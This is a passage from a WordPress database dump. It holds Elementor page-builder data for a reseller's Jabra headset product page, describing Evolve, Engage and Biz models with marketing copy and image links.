]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8521,3647,'_elementor_template_type','post'),(8519,3647,'_wp_page_template','template-fullwidth.php'),(8520,3647,'_elementor_edit_mode','builder'),(8523,3647,'_elementor_version','0.4'),(8597,3654,'_edit_last','1'),(8598,3654,'_elementor_controls_usage','a:0:{}'),(8526,3648,'_wp_page_template','template-fullwidth.php'),(8527,3648,'_elementor_edit_mode','builder'),(8528,3648,'_elementor_template_type','post'),(8529,3648,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 style=\\\"text-align: center;\\\"><strong>Jabra<\\/strong><\\/h1><h3 style=\\\"text-align: center;\\\">Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"03\",\"right\":\"03\",\"bottom\":\"03\",\"left\":\"03\",\"isLinked\":true},\"border_color\":\"#e2e2e2\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.919,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.081,\"margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"337d102\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b419c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b34a6f3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#efefef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":0,\"bottom\":\"12\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65t<\\/strong><\\/h2><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"54e8d0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2852 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\\\" alt=\\\"\\\" width=\\\"163\\\" height=\\\"163\\\" \\/><\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"93ab181\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2853 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 80<\\/strong><\\/h2><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75e<\\/strong><\\/h2><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"93f376b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2854 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f104529\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2855 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\\\" alt=\\\"\\\" width=\\\"201\\\" height=\\\"201\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"ng-binding ng-scope\\\" style=\\\"text-align: center;\\\"><strong>Jabra Evolve 75<\\/strong><\\/h2><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 65 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"89a0b3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2856 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\\\" alt=\\\"\\\" width=\\\"203\\\" height=\\\"203\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"434120f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2857 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\\\" alt=\\\"\\\" width=\\\"209\\\" height=\\\"209\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 40 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 30 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e63500c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"200\\\" height=\\\"200\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3f45227\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"216\\\" height=\\\"216\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 SE<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ef4be63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2867 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\\\" alt=\\\"\\\" width=\\\"204\\\" height=\\\"204\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1a49967\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2870 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"249\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Engage 50<\\/strong><\\/h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3befa73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a85e5e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d60555\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Jabra Biz Wired Series<\\/strong><\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"83ee6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"179\\\" height=\\\"179\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fd4de1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2875 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\\\" alt=\\\"\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jabra BIZ 2400 II Mono 3-in-1<\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II DUO<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8703933\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b09d5f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"21f7fb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300<\\/strong><\\/h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4047bd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2876 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\\\" alt=\\\"\\\" width=\\\"186\\\" height=\\\"186\\\" 